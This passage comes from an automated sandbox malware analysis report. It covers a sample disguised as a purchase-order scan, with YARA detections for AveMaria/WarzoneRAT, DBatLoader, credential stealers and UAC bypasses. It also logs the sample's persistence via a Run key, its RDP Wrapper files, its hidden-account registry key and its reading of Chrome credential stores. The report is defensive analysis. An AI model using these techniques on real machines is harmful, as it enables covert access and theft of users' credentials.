Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270305300.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273035450.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301644508.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289479394.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.279364787.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.284589516.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.280888970.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268218523.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270904904.0000000004D98000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267444951.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300483004.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299353621.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.279757663.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300657282.0000000004D54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278030501.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302938351.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273169428.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.297573207.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299274956.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300014951.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304767803.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303677579.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275388455.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270988395.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299775583.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300951400.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295256172.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304631501.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.290048891.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278239656.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.288235703.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272476015.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281524879.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276845972.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289728354.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298953642.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277588788.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304959179.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305161185.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Reputation: low

File Activities

Registry Activities
Key Value Created
Key Path Name Type Data Completion Count Source Address Symbol

HKEY_CURRENT_USER\Softwar Scxozm unicode C:\Users\Public\Libraries\mzoxcS.url success or wait 1 4F42BF6 RegSetValueEx

e\Mic A
rosoft\Windows\CurrentVersion\
Run

Analysis Process: cmd.exe PID: 792, Parent PID: 1476

General
Target ID: 12

Start time: 15:51:18

Start date: 25/07/2022

Path: C:\Windows\SysWOW64\cmd.exe

Wow64 process (32bit): true

Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\Scxozmt.bat" "

Imagebase: 0x1190000

File size: 232960 bytes

MD5 hash: F3BDBE3BB6F734E357235F4D5898582D

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Reputation: high

File Activities
File Path Access Attributes Options Completion Count Source Address Symbol

File Read
File Path Offset Length Completion Count Source Address Symbol

C:\Users\Public\Libraries\Scxozmt.bat unknown 8191 success or wait 1 119FB07 ReadFile

C:\Users\Public\Libraries\Scxozmt.bat unknown 8191 end of file 1 119FB07 ReadFile

Analysis Process: conhost.exe PID: 5528, Parent PID: 792

General
Target ID: 13

Start time: 15:51:19

Start date: 25/07/2022

Path: C:\Windows\System32\conhost.exe

Wow64 process (32bit): false

Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Imagebase: 0x7ff647620000

File size: 625664 bytes

MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Reputation: high

Analysis Process: cmd.exe PID: 5784, Parent PID: 792

General
Target ID: 14

Start time: 15:51:20

Start date: 25/07/2022

Path: C:\Windows\SysWOW64\cmd.exe

Wow64 process (32bit): true

Commandline: C:\Windows\system32\cmd.exe /K C:\Users\Public\Libraries\ScxozmO.bat

Imagebase: 0x1190000

File size: 232960 bytes

MD5 hash: F3BDBE3BB6F734E357235F4D5898582D

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Reputation: high

File Activities
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Copyright Joe Security LLC 2022 Page 53 of 74
File Path Access Attributes Options Completion Count Source Address Symbol

Analysis Process: conhost.exe PID: 5472, Parent PID: 5784

General
Target ID: 15

Start time: 15:51:20

Start date: 25/07/2022

Path: C:\Windows\System32\conhost.exe

Wow64 process (32bit): false

Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Imagebase: 0x7ff647620000

File size: 625664 bytes

MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Reputation: high

Analysis Process: Scan_IMG-Purchase Order.exe PID: 3364, Parent PID: 1476

General
Target ID: 17

Start time: 15:51:21

Start date: 25/07/2022

Path: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

Wow64 process (32bit): true

Commandline: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

Imagebase: 0x400000

File size: 818176 bytes

MD5 hash: C9EE1D6A90BE7524B01814F48B39B232

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Yara matches: Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.329850284.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.329850284.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330628254.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330628254.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.318865751.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.318450222.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.319731726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.319289464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000002.527601227.0000000000912000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000002.527601227.0000000000912000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000002.521632328.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 54 of 74
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330232103.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330232103.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.318046081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000002.530212616.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000002.532617862.00000000057C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.320210057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Reputation: low

File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Microsoft Vision\ read data or list device directory file | success or wait 1 7D756F CreateDirect
directory | synchronous io oryW
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Temp\159.exe read attributes | device synchronous io success or wait 1 7D3F5B CreateFileW

synchronize | non alert | non
generic write directory file

C:\Program Files\Microsoft DN1\sqlmap.dll read attributes | device synchronous io success or wait 1 7D3AFE CreateFileW
synchronize | non alert | non
generic read | directory file
generic write

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Windows\System32\rfxvmt.dll read attributes | device synchronous io object name collision 1 7D3AFE CreateFileW
synchronize | non alert | non
generic read | directory file
generic write

C:\Program Files\Microsoft DN1\rdpwrap.ini read attributes | device synchronous io success or wait 1 7D3AFE CreateFileW
synchronize | non alert | non
generic read | directory file
generic write

File Deleted
File Path Completion Count Source Address Symbol

C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe:Zone.Identifier success or wait 1 7D5255 DeleteFileW

File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Te 0 60000 4d 5a fd 00 03 00 00 00 MZ@!L!This program success or wait 2 7D3EE8 WriteFile

mp\159.exe 04 00 00 00 fd fd 00 00 fd cannot be run in DOS
00 00 00 00 00 00 00 40 mode.$j9.WG.WG.WG~T
00 00 00 00 00 00 00 00 F
00 00 00 00 00 00 00 00 "WG~RFWG~SF<WG|vR
00 00 00 00 00 00 00 00 FWG|vSF?WG|vT
00 00 00 00 00 00 00 00 F;WGw_F
00 00 00 18 01 00 00 0e WG~QF/WG~VF)WG.VG
1f fd 0e 00 fd 09 fd 21 fd CWGwR
01 4c fd 21 54 68 69 73 F,WGwG/WGwUF/WGRi
20 70 72 6f 67 72 61 6d ch.W
20 63 61 6e 6e 6f 74 20
62 65 20 72 75 6e 20 69
6e 20 44 4f 53 20 6d 6f
64 65 2e 0d 0d 0a 24 00
00 00 00 00 00 00 6a 7f
39 14 2e 1e 57 47 2e 1e
57 47 2e 1e 57 47 0c 7e
54 46 22 1e 57 47 0c 7e
52 46 fd 1e 57 47 0c 7e
53 46 3c 1e 57 47 7c 76
52 46 0a 1e 57 47 7c 76
53 46 3f 1e 57 47 7c 76
54 46 3b 1e 57 47 fd 77
5f 46 20 1e 57 47 0c 7e
51 46 2f 1e 57 47 0c 7e
56 46 29 1e 57 47 2e 1e
56 47 43 1e 57 47 fd 77
52 46 2c 1e 57 47 fd 77
fd 47 2f 1e 57 47 fd 77 55
46 2f 1e 57 47 52 69 63
68 2e 1e 57

File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Program Files\Microsoft DN1 0 116736 4d 5a fd 00 03 00 00 00 MZ@!L!This program success or wait 1 7D3EE8 WriteFile
\sqlmap.dll 04 00 00 00 fd fd 00 00 fd cannot be run in DOS
00 00 00 00 00 00 00 40 mode.$NrB/!B/!B/!~!j
00 00 00 00 00 00 00 00 /!~!&/!~3!H/!'!G/!B/!/!O}!F/
00 00 00 00 00 00 00 00 !O
00 00 00 00 00 00 00 00 }0!C/!O}7!C/!O}2!C/!Rich
00 00 00 00 00 00 00 00 B/!PEdZT
00 00 00 fd 00 00 00 0e
1f fd 0e 00 fd 09 fd 21 fd
01 4c fd 21 54 68 69 73
20 70 72 6f 67 72 61 6d
20 63 61 6e 6e 6f 74 20
62 65 20 72 75 6e 20 69
6e 20 44 4f 53 20 6d 6f
64 65 2e 0d 0d 0a 24 00
00 00 00 00 00 00 06 4e
fd 72 42 2f fd 21 42 2f fd
21 42 2f fd 21 04 7e 0d
21 6a 2f fd 21 04 7e 0c
21 26 2f fd 21 04 7e 33
21 48 2f fd 21 fd fd 27 21
47 2f fd 21 42 2f fd 21 1d
2f fd 21 4f 7d 09 21 46 2f
fd 21 4f 7d 30 21 43 2f fd
21 4f 7d 37 21 43 2f fd 21
4f 7d 32 21 43 2f fd 21 52
69 63 68 42 2f fd 21 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 50
45 00 00 64 fd 06 00 5a
fd fd 54 00 00 00

C:\Program Files\Microsoft DN1 0 281633 3b 20 52 44 50 20 57 72 ; RDP Wrapper Library success or wait 1 7D3EE8 WriteFile
\rdpwrap.ini 61 70 70 65 72 20 4c 69 configuration; Do not
62 72 61 72 79 20 63 6f modify without special
6e 66 69 67 75 72 61 74 knowledge; Edited by se
69 6f 6e 0d 0a 3b 20 44 baxakerhtc[Main]Updated
6f 20 6e 6f 74 20 6d 6f 64 =2022-07-
69 66 79 20 77 69 74 68 02LogFile=\rdpwrap.txtSL
6f 75 74 20 73 70 65 63 Poli
69 61 6c 20 6b 6e 6f 77 cyHookNT60=1SLPolicy
6c 65 64 67 65 0d 0a 3b HookNT61=1
20 45 64 69 74 65 64 20 [SLPolicy]TerminalServic
62 79 20 73 65 62 61 78 es-Rem
61 6b 65 72 68 74 63 0d oteConnectionManager-
0a 0d 0a 5b 4d 61 69 6e Al
5d 0d 0a 55 70 64 61 74
65 64 3d 32 30 32 32 2d
30 37 2d 30 32 0d 0a 4c
6f 67 46 69 6c 65 3d 5c
72 64 70 77 72 61 70 2e
74 78 74 0d 0a 53 4c 50
6f 6c 69 63 79 48 6f 6f 6b
4e 54 36 30 3d 31 0d 0a
53 4c 50 6f 6c 69 63 79
48 6f 6f 6b 4e 54 36 31
3d 31 0d 0a 0d 0a 5b 53
4c 50 6f 6c 69 63 79 5d
0d 0a 54 65 72 6d 69 6e
61 6c 53 65 72 76 69 63
65 73 2d 52 65 6d 6f 74
65 43 6f 6e 6e 65 63 74
69 6f 6e 4d 61 6e 61 67
65 72 2d 41 6c

File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\ 0 40960 53 51 4c 69 74 65 20 66 SQLite format 3@ .C success or wait 1 7CFC2A CopyFileW

.JmyHai.tmp 6f 72 6d 61 74 20 33 00
08 00 01 01 00 40 20 20
00 00 00 01 00 00 00 14
00 00 00 00 00 00 00 00
00 00 00 0b 00 00 00 04
00 00 00 00 00 00 00 00
00 00 00 01 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 01
00 2e 43 fd 05 00 00 00
01 07 fd 00 00 00 00 10
07 fd 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00

C:\Users\user\AppData\Roaming\ 0 87300 7b 22 62 72 6f 77 73 65 {"browser": success or wait 1 7CFC3E CopyFileW

JJrxrvA.tmp 72 22 3a 7b 22 6c 61 73 {"last_redirect_ori
74 5f 72 65 64 69 72 65 gin":"","shortcut_migratio
63 74 5f 6f 72 69 67 69 n_ve
6e 22 3a 22 22 2c 22 73 rsion":"85.0.4183.121"},"d
68 6f 72 74 63 75 74 5f ata_use_measurement":
6d 69 67 72 61 74 69 6f {"data_used":{"services":
6e 5f 76 65 72 73 69 6f {"background":{},"
6e 22 3a 22 38 35 2e 30 foreground":{}},"user":
2e 34 31 38 33 2e 31 32 {"background":
31 22 7d 2c 22 64 61 74 {},"foreground":{}}}},"
61 5f 75 73 65 5f 6d 65 hardware_acceleration_m
61 73 75 72 65 6d 65 6e ode_previous":true,"in
74 22 3a 7b 22 64 61 74
61 5f 75 73 65 64 22 3a
7b 22 73 65 72 76 69 63
65 73 22 3a 7b 22 62 61
63 6b 67 72 6f 75 6e 64
22 3a 7b 7d 2c 22 66 6f
72 65 67 72 6f 75 6e 64
22 3a 7b 7d 7d 2c 22 75
73 65 72 22 3a 7b 22 62
61 63 6b 67 72 6f 75 6e
64 22 3a 7b 7d 2c 22 66
6f 72 65 67 72 6f 75 6e
64 22 3a 7b 7d 7d 7d 7d
2c 22 68 61 72 64 77 61
72 65 5f 61 63 63 65 6c
65 72 61 74 69 6f 6e 5f
6d 6f 64 65 5f 70 72 65
76 69 6f 75 73 22 3a 74
72 75 65 2c 22 69 6e

File Read
File Path Offset Length Completion Count Source Address Symbol

C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe unknown 818176 success or wait 1 7D5D7C ReadFile

C:\Users\user\AppData\Roaming\.JmyHai.tmp unknown 100 success or wait 1 7FD7887 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 87300 success or wait 1 7D0549 ReadFile

C:\Users\user\AppData\Roaming\.JmyHai.tmp unknown 2048 success or wait 1 7FD7887 ReadFile

Registry Activities
Key Created
Key Path Completion Count Source Address Symbol

Key Path Completion Count Source Address Symbol

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HN7J6B4LG6 success or wait 1 7D4CFD RegCreateKeyEx

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts success or wait 1 7D2253 RegCreateKeyEx

